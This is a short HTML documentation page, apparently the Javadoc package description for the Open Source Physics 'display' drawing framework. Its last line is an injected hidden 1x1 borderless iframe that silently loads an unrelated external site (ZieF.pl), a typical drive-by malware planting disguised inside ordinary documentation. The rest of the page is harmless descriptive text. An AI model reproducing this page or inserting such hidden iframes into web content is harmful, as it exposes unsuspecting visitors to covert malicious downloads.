

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>
<body>
<p>The display package contains the drawing framework for the book Simulations in Physics.</p>
<p>The <code>Display </code>package framework defines objects that implement the Drawable interface and a DrawingPanel
for rendering these objects.</p>
<p align="center"><img border="0" src="doc-files/drawingframe_display.gif" width="300" height="300"></p>
<p align="center">An <code>PlotPanel</code> containing two data sets.</p>
<p>Copyright (c) 2001 H. Gould, J. Tobochnik, and W. Christian.</p>
<p>@see org.opensourcephysics.display.Drawable</p>
<iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
</body>